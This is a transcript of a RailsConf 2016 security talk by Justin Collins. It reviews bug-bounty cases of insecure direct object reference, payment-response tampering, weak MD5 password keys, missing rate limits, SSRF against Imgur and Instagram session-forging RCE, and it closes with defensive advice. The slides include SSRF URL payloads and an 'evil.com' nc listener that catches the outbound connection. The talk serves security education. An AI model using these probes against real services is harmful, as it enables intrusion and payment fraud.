"...But Doesn't Rails Take Care of Security for Me?"

Rails comes with protection against SQL injection, cross-site scripting, and cross-site request forgery. It provides strong parameters and encrypted session cookies out of the box. What else is there to worry about? Unfortunately, security does not stop at the well-known vulnerabilities, and even the most secure web framework cannot save you from everything. Let's take a deep dive into real-world examples of security gone wrong!

Justin Collins

May 06, 2016

Transcript

  1. @presidentbeef “...But Doesn’t Rails Take Care of Security for Me?” Justin Collins @presidentbeef RailsConf 2016
  2. @presidentbeef No.

  3. @presidentbeef Thank you!

  4. @presidentbeef Ugh, about me: 6 years of application security (AT&T Interactive, Twitter, SurveyMonkey). 6 years working on Brakeman OSS (static analysis security tool for Rails). 2 years working on (More pro static analysis security tool for Rails).
  5. @presidentbeef What Rails Does and Doesn’t

  6. @presidentbeef Security Theater

  7. @presidentbeef

  8. @presidentbeef https://hackerone.com/reports/27404

  9. @presidentbeef

  10. @presidentbeef POST /accounts/18ce53wqoxd/payment_methods/handle_failed/220152

  11. @presidentbeef POST /accounts/18ce53wqoxd/payment_methods/handle_failed/220152

  12. @presidentbeef POST /accounts/18ce53wqoxd/payment_methods/handle_failed/220151

  13. @presidentbeef PaymentMethod.find(params[:id]).delete

  14. @presidentbeef “Insecure Direct Object Reference” “Unscoped Find”

  15. @presidentbeef current_user.payment_methods.find(params[:id]).delete

  16. @presidentbeef Bounty: $2,800

  17. @presidentbeef https://randywestergren.com/united-airlines-bug-bounty-an-experience-in-reporting-a-serious-vulnerability/

  18. @presidentbeef Proxy

  19. @presidentbeef POST https://smartphone.continental.com/UnitedMobileDataServices/api/wallet/AccessWalletItemsv2 { "accessCode": "'", "application": { "version": { "build": "", "displayText": "2.0.20", "major": "", "minor": "" }, "name": "Android", "isProduction": true, "id": 2 }, "deviceID": "37556b06-66bf-40a3-9368-f13b0faa437d", "languageCode": "en-US", "mpNumber": "***REMOVED***", "pushToken": "***REMOVED***", "transactionId": "***REMOVED***", "backgroundRefresh": true }
  20. @presidentbeef { "walletPNRResponse": { "pnrs": [ { "mpNumber": "***REMOVED***", "recordLocator": "***REMOVED***", "flightDate": "12/05/2015 06:35 PM", "origin": "PHL", "originCity": "Philadelphia", "destination": "MCO", "destinationCity": "Orlando", "checkInStatus": "0", "firstName": "RANDOLPHA", "lastName": "WESTERGRENJR", "segments": [ { "recordLocator": "***REMOVED***", "carrierCode": "UA", "flightNumber": "3336", "origin": "PHL", "destination": "IAD", "scheduledDepartureDateTime": "12/5/2015 6:35 PM", "scheduledArrivalDateTime": "12/5/2015 7:41 PM", "scheduledDepartureDateTimeGMT": "12/05/2015 11:35 PM", "scheduledArrivalDateTimeGMT": "12/06/2015 12:41 AM", "seats": "", "activationDateTimeGMT": "", "flightStatusSegment": null, "flightStatus": null, "destinationWeather": null, "lastUpdated": "05/27/2015 07:31 AM", "enableUberLinkButton": false, "cabin": "Coach", "cabinType": "United Economy" }, # ...
  21. @presidentbeef { "walletPNRResponse": { "pnrs": [ { "mpNumber": "***REMOVED***", "recordLocator": "***REMOVED***", "flightDate": "12/05/2015 06:35 PM", "origin": "PHL", "originCity": "Philadelphia", "destination": "MCO", "destinationCity": "Orlando", "checkInStatus": "0", "firstName": "RANDOLPHA", "lastName": "WESTERGRENJR", # ...
  22. @presidentbeef

  23. @presidentbeef Bounty: $0 (Duplicate)

  24. @presidentbeef http://www.ifc0nfig.com/dominos-pizza-and-payments/

  25. @presidentbeef 1. CC # 2. Success Ref # 3. Order # Ref #
  26. @presidentbeef 1. CC # 2. Failure Ref # X

  27. @presidentbeef WARNING: XML AHEAD

  28. @presidentbeef Payment Failure Response
    <Response>
      <CardTxn>
        <authcode>NOT AUTHORISED</authcode>
        <card_scheme>VISA</card_scheme>
      </CardTxn>
      <datacash_reference>3340105259009953</datacash_reference>
      <merchantreference>3340105259009953</merchantreference>
      <mode>LIVE</mode>
      <reason>DECLINED</reason>
      <status>7</status>
      <time>1449024000</time>
    </Response>
  29. @presidentbeef Payment Failure Response
    <Response>
      <CardTxn>
        <authcode>NOT AUTHORISED</authcode>
        <card_scheme>VISA</card_scheme>
      </CardTxn>
      <datacash_reference>3340105259009953</datacash_reference>
      <merchantreference>3340105259009953</merchantreference>
      <mode>LIVE</mode>
      <reason>SUCCESS</reason>
      <status>1</status>
      <time>1449024000</time>
    </Response>
  30. @presidentbeef 1. CC # 2. Failure Ref # X

  31. @presidentbeef 1. CC # 2. Success Ref # X

  32. @presidentbeef 1. CC # 2. Success Ref # 3. Order # Ref #
  33. @presidentbeef

  34. @presidentbeef Lack of Server-Side Validation

  35. @presidentbeef http://cynosureprime.blogspot.com/2015/09/how-we-cracked-millions-of-ashley.html

  36. @presidentbeef ~36 million passwords leaked

  37. @presidentbeef ~36 million passwords leaked Hashed with bcrypt (good)

  38. @presidentbeef WARNING: PHP CODE AHEAD

  39. @presidentbeef But... $password = User::encryptPassword($Values['password']); $loginkey = md5(strtolower($username).'::'.strtolower($password));

  40. @presidentbeef BUT... $password = $Values['password']; $loginkey = md5(strtolower($username).'::'.strtolower($password));

  41. @presidentbeef Also... md5(lc($username)."::".lc($pass).":".lc($email).":73@^bhhs&#@&^@8@*$")

  42. @presidentbeef 2.6 million passwords cracked

  43. @presidentbeef 2.6 million passwords cracked In a few hours

  44. @presidentbeef 11.7 million passwords cracked In a few days

  45. @presidentbeef Weak Hashing Algorithm

  46. @presidentbeef http://www.anandpraka.sh/2016/03/how-i-could-have-hacked-your-facebook.html

  47. @presidentbeef

  48. @presidentbeef beta.facebook.com

  49. @presidentbeef Missing rate limit

  50. @presidentbeef Bounty: $15,000

  51. @presidentbeef https://hackerone.com/reports/115748

  52. @presidentbeef

  53. @presidentbeef https://imgur.com/vidgif/url?url=http://bit.ly/1e1EYJv

  54. @presidentbeef https://imgur.com/vidgif/url?url=http://bit.ly/1e1EYJv Server-Side Request Forgery

  55. @presidentbeef https://imgur.com/vidgif/url?url=sftp://bit.ly/1e1EYJv

  56. @presidentbeef Capture Connection Strings
    evil.com:$ nc -v -l 11111
    Listening on [0.0.0.0] (family 0, port 11111)
    Connection from [54.166.236.232] port 11111 [tcp/*] accepted
    CLIENT libcurl 7.40.0
    QUIT
  57. @presidentbeef Libcurl supports: SSH (scp://, sftp://), POP3, IMAP, SMTP, FTP, DICT, GOPHER, TFTP
  58. @presidentbeef Bounty: $2,000

  59. @presidentbeef http://exfiltrated.com/research-Instagram-RCE.php

  60. @presidentbeef https://sensu.instagram.com/

  61. @presidentbeef

  62. @presidentbeef Rails App

  63. @presidentbeef

  64. @presidentbeef

  65. @presidentbeef Session cookie is signed marshalled code

  66. @presidentbeef Signing key = Remote code execution

  67. @presidentbeef Forged Session Remote Shell

  68. @presidentbeef And then things got worse...

  69. @presidentbeef Forged Session Remote Shell

  70. @presidentbeef Forged Session Remote Shell Passwords!

  71. @presidentbeef Forged Session Remote Shell Passwords! Bcrypt :(

  72. @presidentbeef Six passwords were "changeme". Three were the same as the user's name. Two were "password". One was "instagram".
  73. @presidentbeef

  74. @presidentbeef Forged Session Remote Shell

  75. @presidentbeef Secret in source code. Outdated dependencies. Weak passwords. Keys sitting on servers.
  76. @presidentbeef Bounty: $2,500 + A lot of drama

  77. @presidentbeef In Summary: Verify the current user can access the data / perform the action. Never trust the client - think about trust relationships. Always use strong hashing algorithms. Rate limit important actions. Avoid storing secrets in source code. Always use strong passwords.
  78. @presidentbeef More Resources: OWASP Top 10 Web Vulnerabilities www.owasp.org/index.php/Top_10_2013-Top_10; OWASP Top 10 Proactive Security Controls www.owasp.org/index.php/OWASP_Proactive_Controls; RailsGoat https://github.com/OWASP/railsgoat; nVisium SecCasts https://nvisium.com/seccasts/
  79. @presidentbeef Things I’ll Forget to Mention: I have stickers. Security BoF after Jess’ talk. I am happy to speak at companies in the SF area. @presidentbeef | @brakeman | @brakemanpro